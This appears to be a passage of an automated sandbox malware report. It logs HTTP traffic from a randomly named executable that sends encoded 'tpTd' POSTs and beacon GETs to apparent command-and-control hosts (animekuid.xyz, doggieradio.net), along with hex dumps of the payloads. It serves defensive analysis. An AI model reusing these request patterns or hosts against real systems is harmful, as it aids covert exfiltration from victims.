                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.animekuid.xyz
                                                                                                                                                                                                              Origin: http://www.animekuid.xyz
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.animekuid.xyz/7un9/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 31 56 6d 51 6a 64 56 69 74 79 33 32 33 6e 42 6b 67 49 56 5a 2b 65 4b 39 68 4b 52 7a 59 31 34 70 6f 49 4c 6b 76 78 6a 43 57 77 61 6c 38 78 71 68 46 42 66 6e 58 7a 77 43 47 58 44 56 52 57 48 6c 2f 30 49 72 7a 72 75 55 49 58 33 32 76 62 66 69 52 44 41 4c 6c 4a 35 58 54 43 56 4f 34 69 73 41 32 78 6d 48 42 57 47 34 49 38 45 46 65 35 79 71 63 2f 31 4b 55 6f 79 39 4b 6e 31 6e 36 45 38 2b 67 67 72 41 33 37 72 54 4f 30 63 35 6c 61 50 52 56 35 50 6c 4a 39 72 38 6e 4d 41 55 52 67 64 34 6c 72 32 66 35 4c 2f 6d 47 33 48 51 74 47 4c 31 45 68 75 51 70 32 48 35 64 55 66 4b
                                                                                                                                                                                                              Data Ascii: tpTd=1VmQjdVity323nBkgIVZ+eK9hKRzY14poILkvxjCWwal8xqhFBfnXzwCGXDVRWHl/0IrzruUIX32vbfiRDALlJ5XTCVO4isA2xmHBWG4I8EFe5yqc/1KUoy9Kn1n6E8+ggrA37rTO0c5laPRV5PlJ9r8nMAURgd4lr2f5L/mG3HQtGL1EhuQp2H5dUfK


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              14192.168.2.960788203.175.9.128801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:37.040915012 CEST758OUTPOST /7un9/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.animekuid.xyz
                                                                                                                                                                                                              Origin: http://www.animekuid.xyz
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.animekuid.xyz/7un9/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 31 56 6d 51 6a 64 56 69 74 79 33 32 32 48 78 6b 6d 72 39 5a 76 75 4b 2b 2f 61 52 7a 50 6c 34 74 6f 49 48 6b 76 30 44 6f 57 6b 32 6c 38 51 61 68 45 43 48 6e 48 6a 77 43 65 48 44 51 66 32 48 71 2f 30 45 64 7a 70 36 55 49 57 58 32 76 62 76 69 52 77 6f 4b 71 35 35 56 47 79 56 4d 33 43 73 41 32 78 6d 48 42 57 54 66 49 38 4d 46 65 49 43 71 54 36 5a 46 58 6f 79 2b 64 58 31 6e 2b 45 38 41 67 67 71 56 33 36 48 39 4f 33 6b 35 6c 65 48 52 57 73 6a 69 63 4e 72 41 6a 4d 42 55 43 31 67 48 6a 6f 69 42 77 4c 33 77 52 52 58 7a 6e 48 72 72 56 54 6e 4c 38 68 48 65 61 7a 57 69 64 72 79 6a 73 49 52 63 45 6f 71 63 36 46 48 5a 4d 61 4c 42 59 67 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=1VmQjdVity322Hxkmr9ZvuK+/aRzPl4toIHkv0DoWk2l8QahECHnHjwCeHDQf2Hq/0Edzp6UIWX2vbviRwoKq55VGyVM3CsA2xmHBWTfI8MFeICqT6ZFXoy+dX1n+E8AggqV36H9O3k5leHRWsjicNrAjMBUC1gHjoiBwL3wRRXznHrrVTnL8hHeazWidryjsIRcEoqc6FHZMaLBYg==
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444736958 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:34:37 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              Link: <https://animekuid.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                              Content-Encoding: br
                                                                                                                                                                                                              Content-Length: 9101
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Data Raw: 13 c4 bc 14 91 98 0f 80 8a c0 b8 89 8f 75 9e ef 3f 35 f5 ff eb 78 e6 16 fd 31 32 4f 26 5f 00 10 1b 57 99 ca b6 df c5 8e ef 66 7b 34 20 09 4a 8c b9 0d 01 59 54 14 55 fd 6f 7f d3 be bf 7c 53 b5 33 c0 08 87 d4 a9 b3 9b da 95 e2 29 76 0e b1 28 9d 2b ea bd b7 bb 9a 1f ee c6 ff ee 80 99 03 0f 9c 39 10 94 07 cc 00 a9 f1 80 0a 6f df ee df 7f 77 38 90 59 01 a4 64 c5 00 c5 08 39 84 d0 79 dc f4 29 b6 05 04 34 d4 5c e9 32 97 7e 8c 66 db 3e 4b b1 10 24 bc 7c 7f 2f 2e 5f 4e 7c de 2b 7c 62 44 60 9d f8 72 a4 df 3f 27 ae 84 44 c4 55 5e c7 63 a8 f6 be 25 1f 11 05 c1 86 ac 0f 99 8a ee 7d 4d db 18 10 5f 38 a1 ce 47 09 b0 ce af 60 93 eb da c3 57 bd 4c 8e 4c 4f 6e ae d1 99 f4 e9 bd c3 4d ff e5 0c 00 e0 72 85 8e 14 86 f9 5a 8e ba d9 8e 27 ec 6b b2 69 43 15 a3 1d 52 74 e4 95 a8 63 68 3a 75 75 94 63 5b e5 07 37 55 5f c0 cd 56 e8 07 07 b8 88 80 30 7f 3d ce 97 f0 b2 6f 3a f3 79 f7 f1 cd de cc 1e f8 d9 65 db f4 0f 30 ff 01 ec be 47 3d f4 ce 52 d2 1c d7 63 63 3b 0c 70 9f 3c 47 d6 9f 95 7f d5 ce 4c 8d 6e 9f 7d 2c 87 de a2 1a c8 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: u?5x12O&_Wf{4 JYTUo|S3)v(+9ow8Yd9y)4\2~f>K$|/._N|+|bD`r?'DU^c%}M_8G`WLLOnMrZ'kiCRtch:uuc[7U_V0=o:ye0G=Rcc;p<GLn},4YQq2<WTfDuUYZ+WeIlbl2[-)c}nz>0 [elu=YvR~cuBHb&xjhW=}q~;g&Qb/]wGaybk*$ZT<M9Yh 2l"JQqR,P#}0J`3sv"Pf0fDRgMiN`1[}n6EAGBrNq1z!uQ^y"(w]S#(1M:1SD7XdHfj5}mvW+bzdRF]9#3;!(@Mq>n>kM/K{I;H]b*LyD#*<{\
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444752932 CEST1236INData Raw: b5 6f 1c 1a 0b 6b 07 a6 44 e3 ca 4c 85 cb ca f9 ba 74 9b bd 06 f7 8a c3 25 06 6c b1 59 c6 9d 02 a5 67 46 dd 74 88 6f ba fc 28 66 af f0 cd 58 67 33 83 95 b2 4a a6 fa a8 13 79 fc d9 77 e6 b7 da f3 4f 4b 6b ac 6d 86 fe da 0d 93 de 18 6a 8d fb e8 4c
                                                                                                                                                                                                              Data Ascii: okDLt%lYgFto(fXg3JywOKkmjLXJwS<NO*vWtZQ[*tMcCmy3t57Mx9M1Not=SkuRzfd7f"0yO#y)|u%~QtY
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444762945 CEST1236INData Raw: 4f e8 91 fb 0d aa c6 ba 20 1b 2a 19 6d 2f f0 a9 9a 07 b9 33 3b e0 74 a8 27 2e 74 db 5a bb 16 49 08 55 43 9f 6c 0e ca a8 d0 84 e8 9e ad 42 e6 72 9d f0 ea 66 e3 a9 ad f9 47 03 7f f2 69 18 86 4b a5 08 bc e5 55 93 39 f9 c9 77 81 3d 01 ce 80 69 66 3a
                                                                                                                                                                                                              Data Ascii: O *m/3;t'.tZIUClBrfGiKU9w=if::]%ttJ wHO,r3&{ w}5};CoV[._5\^t0rb2uK<)}8iAq=f`p&D]j"RTvu7Tj^
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444848061 CEST1236INData Raw: d9 87 68 82 fb 4f 9b 08 59 9a 2a 86 ab f1 54 a0 4f 46 21 4e 92 1a 9b eb 8e fa 12 bd 51 73 be c6 0a 9f 85 28 d1 12 d7 8f b1 e0 77 c8 f3 7b 16 c5 98 27 95 53 ff 22 17 8d a9 29 c3 31 58 2b c1 1b 98 b8 7e 82 b9 a8 0a 55 2e 33 fc d8 b8 28 4a a3 5d 53
                                                                                                                                                                                                              Data Ascii: hOY*TOF!NQs(w{'S")1X+~U.3(J]SqCU%xjGX9hlUBAtVY&ov2y+0y{EQ&Z^(ThixNXPq?ZIe2|5B~ )j&p;*|\`kRdLEwD
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444858074 CEST1236INData Raw: 30 30 d4 cd 1a 35 6a 73 14 bb a4 8b 7e 00 3c 15 33 4f 5f 54 bc f8 05 4c 00 fb fa 7f 6b 57 6e 09 29 43 09 7b 73 c2 24 06 1d dc 59 f6 6f 25 df 9a d6 60 36 70 76 15 4e c5 90 88 cf 29 62 b3 56 14 64 7f f8 a1 59 23 8a 49 24 fd 10 4a 57 e8 88 88 70 85
                                                                                                                                                                                                              Data Ascii: 005js~<3O_TLkWn)C{s$Yo%`6pvN)bVdY#I$JWp'j@`.bKia5Jd#Xi 3p.Y5"VLo.`RS-={lKn/^2lcai>B\bA=n[vKs*JM2+'!"V
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444864035 CEST1236INData Raw: b1 17 76 af 39 57 de b9 16 ef c3 19 17 bb 50 56 4b 2e 24 f9 28 80 46 27 34 e5 a2 1e 12 92 af 9c 4c 4b 67 bf 75 d6 ba 75 a9 a7 ab ee 4a 45 3a 17 b9 39 ca 7a 0c 2b 11 3b 32 aa 47 58 0f b1 1d 7e 58 79 ee 78 29 63 18 a6 72 50 f8 93 bb f4 23 45 99 23
                                                                                                                                                                                                              Data Ascii: v9WPVK.$(F'4LKguuJE:9z+;2GX~Xyx)crP#E#zb*IpJg;X<qQ`CqAYbzJaD]/WuGX.X_Du/XJ#C&_s=# -iDz'dq>4-R}BQ"-2.TAJ
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444875002 CEST1236INData Raw: a1 f1 84 80 e1 4d a2 50 25 40 51 b5 94 c3 c5 02 26 b7 dd 22 99 47 6f 73 d5 16 d8 a0 7e 55 7d 65 62 50 5f 76 30 c2 60 72 10 13 67 1d ea f6 69 f8 1d 88 45 af e9 b3 4f 54 21 55 e1 d1 79 7e 45 64 00 08 54 bc af b0 a5 64 ca 13 d0 33 54 26 1b 91 50 a1
                                                                                                                                                                                                              Data Ascii: MP%@Q&"Gos~U}ebP_v0`rgiEOT!Uy~EdTd3T&PtH{{!tsUFNJGH%Z-cR!VL@>[8=gq@)/,$}/\F4JK*SpFB=JQ21F-IdL&q<)t^2R7
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.445055962 CEST839INData Raw: 27 20 96 fe e5 35 45 5a 78 fc 91 cd e5 63 42 c9 f9 fd ca 66 fd 72 4d 52 4a 16 93 ac 95 fb 58 41 a4 69 1d 30 35 d2 a6 66 bb 75 a1 2a 9e f6 37 00 fe e8 7a 44 6c a2 d8 2e 2a c4 a0 0e 02 00 b9 dc 28 39 79 77 60 8c 42 06 36 75 9b 73 9d d8 2e 6d 1d 39
                                                                                                                                                                                                              Data Ascii: ' 5EZxcBfrMRJXAi05fu*7zDl.*(9yw`B6us.m9(2gh_>^w"iX9iCqG2xixvi*?N}x 3N2db&m[1g l3zp*kam{Xv`!Ia:\V/ZLc


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              15192.168.2.960807203.175.9.128801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:39.583482981 CEST1771OUTPOST /7un9/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.animekuid.xyz
                                                                                                                                                                                                              Origin: http://www.animekuid.xyz
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.animekuid.xyz/7un9/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 31 56 6d 51 6a 64 56 69 74 79 33 32 32 48 78 6b 6d 72 39 5a 76 75 4b 2b 2f 61 52 7a 50 6c 34 74 6f 49 48 6b 76 30 44 6f 57 6b 2b 6c 38 47 6d 68 46 6a 48 6e 56 7a 77 43 41 58 44 52 66 32 48 7a 2f 77 70 55 7a 70 33 68 49 54 54 32 76 34 6e 69 58 42 6f 4b 39 4a 35 56 5a 69 56 50 34 69 73 56 32 79 65 44 42 57 44 66 49 38 4d 46 65 4b 61 71 58 76 31 46 52 6f 79 39 4b 6e 31 56 36 45 38 37 67 67 7a 69 33 36 43 49 4a 48 45 35 6c 2f 37 52 55 61 58 69 65 74 72 34 6b 4d 42 36 43 31 6b 6d 6a 6f 75 72 77 49 72 65 52 57 6a 7a 6e 79 65 75 43 33 37 6d 6e 43 37 4c 65 55 36 68 63 63 4f 41 6e 35 73 41 53 61 43 62 70 41 71 36 49 75 61 6d 49 61 43 77 6a 2b 66 6a 72 7a 69 65 4b 41 6a 50 57 6d 30 65 74 42 72 44 6e 37 2b 4c 76 56 62 54 68 62 30 67 72 78 46 67 64 63 51 34 6a 74 49 52 2b 74 49 4e 79 6a 34 48 49 6f 6e 35 62 52 38 51 56 59 55 33 59 30 70 2f 51 6a 78 47 57 57 2b 62 78 46 70 37 6a 69 6a 72 67 36 53 62 76 75 71 6a 30 36 45 64 79 6b 69 51 4a 49 79 36 56 43 75 4d 67 37 48 6b 55 78 36 4f 58 6c 5a 77 47 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: tpTd=1VmQjdVity322Hxkmr9ZvuK+/aRzPl4toIHkv0DoWk+l8GmhFjHnVzwCAXDRf2Hz/wpUzp3hITT2v4niXBoK9J5VZiVP4isV2yeDBWDfI8MFeKaqXv1FRoy9Kn1V6E87ggzi36CIJHE5l/7RUaXietr4kMB6C1kmjourwIreRWjznyeuC37mnC7LeU6hccOAn5sASaCbpAq6IuamIaCwj+fjrzieKAjPWm0etBrDn7+LvVbThb0grxFgdcQ4jtIR+tINyj4HIon5bR8QVYU3Y0p/QjxGWW+bxFp7jijrg6Sbvuqj06EdykiQJIy6VCuMg7HkUx6OXlZwGyS0TLp/oNMBTcEuVGI+rmTxO7CICWwq3nGieml721iUNa+lVpeWpZ2WEMdjiwbumK+/OzUlQGkOnaoL/L5aIXScXQRqEm310GGceFv7kfEtc+Y8FAlwAGZxrDBuZjXnyjE3Yh0yfSXygdYGjFYnrAl8OVSmTO3vsE8KCNXtGztZw1cnNDwi5NI1yszlOD6zy+ukmKtlKaO2/aTEIMqWTvJuZ6oG6/rNgaES2TcBaNJLcDdNcCmb6xkxPKkn06shGX8X/b0vzZxWwkn5sKcbyYaQFkQZrsasLtn8wOJ7UyXOcIyeh800NSnssIEYNokYSPEc0UKFffLZ99ZSjMVnMs/9Dme9+oBEX/NhvseLB94Qfx3UlIJEWEJjDNxsTUyT8JdDPcI6dMYZCyXCHhhoYSDa9mEC/x5OkybbCwA92y2R0t4dwNhrGrSoxo3u/z/ajyxucI4SU3TZ4c0dLgOAB+euUQCDpuDY96QkMZ3u0ZJmJU3KtG2X0iLwO7vwQc7qkjuv8+rtosXK9ko6+f519CGrzJdj+UQCDbfi8ewZE/gHIljXUN0RcKyQxTtkyY2w6MwYk+YlvtNE/wz6SmloHvLVCWAN5aeUAaH2gzPnwgLgjlW+TnTb7ao/vAqnDXLaa91rQYCJoJWUXuvV85rWRRShaTamGMzTn68 [TRUNCATED]


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              16192.168.2.960821203.175.9.128801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:42.125914097 CEST474OUTGET /7un9/?tpTd=4XOwgplivDvk/EZOubh+oM7E4qBWP2ACvZmroFPOKBmtqB+PCSuAHgoGD1T4VUWf5wIO7JPBcjeVh4zPUWd0ua1JHgAe3g4A1TGkBV6DNuNtOYfRKw==&WX=rnWllP5PLlhLLtj HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.animekuid.xyz
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:34:43.493650913 CEST521INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:34:42 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                              Location: http://animekuid.xyz/7un9/?tpTd=4XOwgplivDvk/EZOubh+oM7E4qBWP2ACvZmroFPOKBmtqB+PCSuAHgoGD1T4VUWf5wIO7JPBcjeVh4zPUWd0ua1JHgAe3g4A1TGkBV6DNuNtOYfRKw==&WX=rnWllP5PLlhLLtj
                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Oct 8, 2024 15:34:43.504765987 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              17192.168.2.9608323.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.552954912 CEST740OUTPOST /szy7/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.doggieradio.net
                                                                                                                                                                                                              Origin: http://www.doggieradio.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.doggieradio.net/szy7/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 48 2b 35 62 52 53 71 30 4e 72 68 68 70 7a 4f 79 55 78 2f 6f 45 67 75 76 79 30 75 41 38 46 42 63 6f 2b 77 6d 4a 53 41 74 4f 47 5a 71 6e 64 64 79 67 6d 38 41 54 4c 6a 6e 2b 39 4c 46 56 62 76 64 47 39 7a 76 70 32 46 62 5a 6e 57 59 39 76 4c 44 4a 67 77 73 6e 42 4c 75 31 4f 62 47 32 5a 74 35 6f 75 2f 65 55 76 4b 64 49 6a 67 74 36 5a 44 49 66 38 68 6d 6d 2f 6a 55 33 34 49 75 4c 65 77 6a 44 34 44 62 38 6d 76 72 76 4c 76 5a 72 49 58 4a 6e 43 62 70 73 55 31 6f 6b 79 57 4c 58 36 61 4e 77 7a 6d 66 66 4d 77 58 4f 57 58 51 79 55 6d 56 46 44 58 77 74 62 44 30 74 63 62 42
                                                                                                                                                                                                              Data Ascii: tpTd=H+5bRSq0NrhhpzOyUx/oEguvy0uA8FBco+wmJSAtOGZqnddygm8ATLjn+9LFVbvdG9zvp2FbZnWY9vLDJgwsnBLu1ObG2Zt5ou/eUvKdIjgt6ZDIf8hmm/jU34IuLewjD4Db8mvrvLvZrIXJnCbpsU1okyWLX6aNwzmffMwXOWXQyUmVFDXwtbD0tcbB


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              18192.168.2.9608333.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:51.098999977 CEST764OUTPOST /szy7/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.doggieradio.net
                                                                                                                                                                                                              Origin: http://www.doggieradio.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.doggieradio.net/szy7/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 48 2b 35 62 52 53 71 30 4e 72 68 68 6f 54 65 79 58 51 2f 6f 55 77 75 73 72 30 75 41 32 6c 42 51 6f 2b 38 6d 4a 54 30 39 4f 7a 4a 71 6e 38 74 79 68 69 67 41 61 62 6a 6e 31 64 4c 63 49 72 75 54 47 39 2f 52 70 7a 39 62 5a 6e 43 59 39 75 58 44 4f 58 4d 72 6f 78 4c 73 34 75 62 45 79 5a 74 35 6f 75 2f 65 55 73 32 33 49 6c 49 74 6d 35 54 49 5a 64 68 6c 6c 2f 6a 62 79 34 49 75 61 4f 77 76 44 34 44 31 38 69 75 38 76 49 58 5a 72 4d 54 4a 67 58 6e 75 6c 55 31 75 71 53 58 31 59 2f 6e 68 76 52 6d 43 53 66 51 77 59 47 44 47 38 56 47 4c 55 78 65 72 34 4d 44 54 71 37 53 70 47 32 79 59 72 4f 2f 2b 2b 72 70 5a 53 48 35 69 4c 52 54 49 5a 67 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=H+5bRSq0NrhhoTeyXQ/oUwusr0uA2lBQo+8mJT09OzJqn8tyhigAabjn1dLcIruTG9/Rpz9bZnCY9uXDOXMroxLs4ubEyZt5ou/eUs23IlItm5TIZdhll/jby4IuaOwvD4D18iu8vIXZrMTJgXnulU1uqSX1Y/nhvRmCSfQwYGDG8VGLUxer4MDTq7SpG2yYrO/++rpZSH5iLRTIZg==


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              19192.168.2.9608343.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:53.646997929 CEST1777OUTPOST /szy7/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.doggieradio.net
                                                                                                                                                                                                              Origin: http://www.doggieradio.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.doggieradio.net/szy7/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 48 2b 35 62 52 53 71 30 4e 72 68 68 6f 54 65 79 58 51 2f 6f 55 77 75 73 72 30 75 41 32 6c 42 51 6f 2b 38 6d 4a 54 30 39 4f 77 70 71 6e 75 31 79 67 44 67 41 41 62 6a 6e 34 39 4c 5a 49 72 75 65 47 38 58 4e 70 7a 35 68 5a 6c 36 59 37 4d 7a 44 50 6a 59 72 7a 42 4c 73 6b 65 62 46 32 5a 74 57 6f 75 76 61 55 73 6d 33 49 6c 49 74 6d 38 66 49 5a 4d 68 6c 6a 2f 6a 55 33 34 4a 68 4c 65 77 4c 44 34 62 44 38 69 69 73 76 34 33 5a 73 6f 33 4a 6c 68 7a 75 6e 30 31 73 70 53 58 39 59 2f 6a 2b 76 52 36 6b 53 65 6b 4b 59 45 44 47 2f 42 54 73 49 56 71 6f 37 65 48 2f 37 35 2f 4e 63 47 75 68 79 65 57 71 70 75 35 6c 43 43 34 36 48 69 2b 66 62 43 62 42 68 73 77 51 78 32 35 4e 58 74 72 6c 78 71 79 4f 51 2f 62 46 56 6b 77 38 6f 6d 61 52 62 79 71 47 61 7a 78 49 62 49 51 6a 54 68 31 4f 39 69 32 39 35 59 4d 4d 6a 56 61 51 32 34 6e 54 54 31 67 77 32 63 59 34 38 76 5a 68 31 49 59 64 51 63 74 4d 7a 51 48 42 36 42 73 4b 6f 7a 4d 38 75 41 7a 67 2b 7a 70 42 44 53 43 79 72 4e 77 2b 70 51 69 50 70 50 78 68 66 36 32 44 64 [TRUNCATED]
